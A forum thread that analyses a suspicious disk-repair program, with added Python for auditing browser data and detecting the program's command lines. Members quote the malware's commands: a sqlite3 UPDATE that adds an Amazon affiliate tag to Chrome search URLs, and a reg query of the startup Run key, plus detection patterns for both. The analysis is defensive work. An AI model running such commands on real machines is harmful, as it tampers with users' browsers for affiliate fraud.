Easy Disk Drive Repair - what does it do?

Discussion in 'backup, imaging & disk mgmt' started by Callender, Jan 10, 2015.

  1. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
  2. TheRollbackFrog

    TheRollbackFrog Registered Member

    Joined:
    Mar 1, 2011
    Posts:
    3,051
    Location:
    The Pond - USA
    Just a guess here... it scans HDD sectors and when it finds an error, it repairs it. Most of these tool types do nothing more than scan the surface of your hard disk looking for errors during the read operation (soft read errors). When it detects one, it continues to read that sector until it gets the data without error, then does nothing more than re-write that data back to the original sector. Windows may normally not make that error available to you as it has its own read error count to go through before it starts shouting, and most of the time will read the block successfully before that count is reached. These tools use their own count (usually 1) then just re-write followed by a re-read. If the re-read is successful, it moves on.

    Since there's little published documentation and no real "publisher" identified... personally, I wouldn't touch it.
     
  3. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Thanks very much for your response. It seems to make perfect sense and reading through the available information once more I notice that "sector recovery" is mentioned.
     
  4. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    What this does for me is, amongst other things:

    - turn off UAC
    - create a file C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\amazondotcom.xml
    - launch: "C:\Windows\System32\sqlite3.exe" "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Web Data" "update keywords set url = url || '&tag=chrome20-20' where url like '%amazon%' and url not like '%&tag=chrome20-20';"

    Interesting. I'll look some more.
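
Added example, not part of the original posts: a way to audit a copy of Chrome's "Web Data" file for the affiliate tag that the quoted UPDATE appends, and to strip it again. The in-memory table is a constructed, simplified stand-in (only the `keywords` table and `url` column named in the post are modelled), and the function names are hypothetical.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qsl

def sample_web_data():
    """Constructed stand-in for a copy of Chrome's 'Web Data' file; only the
    table and column named in the quoted UPDATE are modelled (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE keywords (id INTEGER PRIMARY KEY, short_name TEXT, url TEXT)")
    db.executemany("INSERT INTO keywords (short_name, url) VALUES (?, ?)", [
        ("Google", "https://www.google.com/search?q={searchTerms}"),
        ("Amazon", "https://www.amazon.com/s?k={searchTerms}&tag=chrome20-20"),
        ("Amazon UK", "https://www.amazon.co.uk/s?k={searchTerms}&tag=chrome20-20"),
        ("Books", "https://books.example/find?q={searchTerms}"),
    ])
    return db

def tag_values(url):
    """Values of any 'tag' query parameter, using the same broad 'amazon'
    substring match as the quoted statement's LIKE '%amazon%'."""
    if "amazon" not in url.lower():
        return []
    query = urlsplit(url).query
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "tag"]

def audit(db):
    """Return (id, short_name, tags) for each search-engine row carrying a tag."""
    rows = db.execute("SELECT id, short_name, url FROM keywords ORDER BY id")
    return [(i, name, tag_values(url)) for i, name, url in rows if tag_values(url)]

def strip_suffix(db, suffix):
    """Remove an exact trailing suffix from keyword URLs; returns rows changed."""
    cur = db.execute(
        "UPDATE keywords SET url = substr(url, 1, length(url) - length(?)) "
        "WHERE substr(url, -length(?)) = ?",
        (suffix, suffix, suffix))
    db.commit()
    return cur.rowcount

if __name__ == "__main__":
    db = sample_web_data()
    for hit in audit(db):
        print("tagged entry:", hit)
    print("rows restored:", strip_suffix(db, "&tag=chrome20-20"))
    print("remaining:", audit(db))
```

On a real profile, run this against a copy of the file with the browser closed, and review each hit before stripping anything, since the audit lists every `tag` value and not only the one quoted here.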
     
  5. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    That is indeed interesting. I've just uninstalled the program and checked for and deleted:

    *\searchplugins\amazondotcom.xml
    C:\Windows\System32\sqlite3.exe

    Reinstalled and there's still no sign of *\searchplugins\amazondotcom.xml

    C:\Windows\System32\sqlite3.exe does get created but does not launch.

    Two things to note: I have Cyberfox installed and Mozilla FF Portable but not the regular FF.

    *\searchplugins\amazondotcom.xml exists in Cyberfox and FF Portable by default.

    I don't have Chrome installed.
     
  6. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    I think there's some logic here where it doesn't necessarily create the Amazon*xml first time. Not figured it out yet. The SQLITE3 command is more definitive, it's mostly visible in the EXE and can be fully seen if you check the program's RAM when it's running (Process Hacker > Memory > Strings, say), plus Process Monitor shows it being executed.

    Other red flags: the program claims 5 star awards it doesn't have, to be around since 2009 and have had a million+ downloads when its domain was registered last month, and to be run by guys who don't exist (in connection with the company, anyway). Also it's written in VB6, claims it can lock and fix a drive while Windows is using it, and if you reset after it's "fixed" one set of "errors", it finds another load next time.

    Oh, specific differences between you and me: I have Chrome and regular FF installed, not Cyberfox or FF Portable.
     
  7. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Just checked again using another method and I find the following in ProcessLasso's log:

    cmd.exe,[ERROR: missing string],Parent easydiskdriverepair.exe (2616), PATH: C:\Windows\SysWOW64\cmd.exe,"C:\Windows\system32\cmd.exe" /c reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f "*chrome*" /d > c:\windows\temp.txt

    So my understanding is limited but it's searching that key for "chrome" and creating a text file?

    c:\windows\temp.txt doesn't actually exist or get created on my machine. Also I don't see any further "errors" detected after running more scans.

    I've got Process Monitor and Process Hacker installed so I'll take a look although I might not understand exactly what I see!
     
  8. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    Yes, that's using the command line reg tool to check for Chrome being launched at startup and redirecting that line - if there is one - to a file. Not sure why they do it that way... Maybe it's less likely to be detected as malicious because it's a trusted application checking the key?

    You don't have Chrome installed, so there won't be any reference and so the file won't be created.

    BTW, hopefully you're running this in a virtual machine/ somewhere safe or unimportant? Make sure you keep restoring your UAC settings after running it (Control Panel > Search UAC > Change User Account Control Settings > Default) and keep in mind that it launches itself at Startup, too. And Uninstall leaves the executable behind. Delete it manually if you're getting rid of it, or rename and copy it somewhere else for further study.
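
Added example, not part of the original posts: detection rules for the two command lines quoted in this thread, run over process-creation events. The events are constructed (the first two follow the ProcessLasso line and the sqlite3 launch quoted above, with the SQL argument abbreviated), and the rule names and event layout are assumptions.

```python
import re

# Rules derived from the two command lines quoted in this thread.
RULES = [
    ("run-key-query-redirected",
     re.compile(r'\breg(?:\.exe)?"?\s+query\s+"?HKCU\\Software\\Microsoft\\Windows'
                r'\\CurrentVersion\\Run\b.*>', re.I)),
    ("sqlite3-on-browser-profile",
     re.compile(r'sqlite3(?:\.exe)?"?\s+"?[^"]*\\User Data\\[^"]*\\Web Data', re.I)),
    ("sqlite3-in-system32",
     re.compile(r'\\Windows\\System32\\sqlite3\.exe', re.I)),
]

# Constructed events as (parent image, command line); the last three are benign.
EVENTS = [
    ("easydiskdriverepair.exe",
     r'"C:\Windows\system32\cmd.exe" /c reg query HKCU\Software\Microsoft\Windows'
     r'\CurrentVersion\Run /f "*chrome*" /d > c:\windows\temp.txt'),
    ("easydiskdriverepair.exe",
     r'"C:\Windows\System32\sqlite3.exe" "C:\Users\<username>\AppData\Local\Google'
     r'\Chrome\User Data\Default\Web Data" "update keywords set url = ..."'),
    ("explorer.exe",
     r'"C:\Windows\system32\cmd.exe" /c reg query HKLM\Software\Microsoft\Windows'
     r'\CurrentVersion /v ProgramFilesDir'),
    ("cmd.exe",
     r'"C:\Tools\sqlite3.exe" "C:\Projects\app\test.db" "select count(*) from users;"'),
    ("chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'),
]

def detect(events):
    """Return (event index, parent, [matched rule names]) for flagged events."""
    findings = []
    for idx, (parent, cmdline) in enumerate(events):
        names = [name for name, rx in RULES if rx.search(cmdline)]
        if names:
            findings.append((idx, parent, names))
    return findings

if __name__ == "__main__":
    for idx, parent, names in detect(EVENTS):
        print(f"event {idx} (parent {parent}): {', '.join(names)}")
```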
     
  9. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Good advice. I'd already uninstalled it a few times and reinstalled. The install is monitored by CPM and I check for leftover folders/ files and registry entries once it's been uninstalled. I'm not using a VM but always have several clean system image backups handy. I don't get that drive locking claim either!

    As for UAC settings - they're disabled and VoodooShield Pro replaces UAC.
     
  10. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    Apologies, should have guessed no-one here would need security advice from me. :) (Although really I just wanted to say it explicitly, because this is doing some strange things.)
     
  11. Keatah

    Keatah Registered Member

    Joined:
    Jan 13, 2011
    Posts:
    853
    Programs like these force the disk to read and read and read a suspect sector till it thinks it gets it right. Eventually the firmware gives up and goes with what it thinks is correct. It reallocates the bad sector to one from the spare (or over provision) space. And voila!! Your disk no longer gives errors. Every sector reads error free again. The only question is what data..?

    The repaired sector may or may not be correct. So you must verify the file that was making use of that "repaired" sector. The guessing algorithm is part of the disk's firmware. Not the program. And it is not accurate all the time. It CANNOT recreate data that is not there to begin with.

    This program is like SpinRite and HDDRegenerator and DRevitalise. They simply trigger the HDD firmware to do a relocate, disregarding the existing data. This often makes a file readable again, but a couple of bytes will not be correct. See for yourself! Next time you encounter the situation, compare the recovered file against a good backup. CRC won't match. Never, ever, ever..

    ADDED: As with most maintenance software it is important to understand exactly what is and what is not being done. Data recovery is no exception. And that is a problem here.

    I'd hate for someone to run this, have it interpolate bad sectors, and call the file good. Then go and rely on the data for a project. Ouch.. Just because it reads from the disk doesn't mean valid data is being read.
     
    Last edited: Jan 21, 2015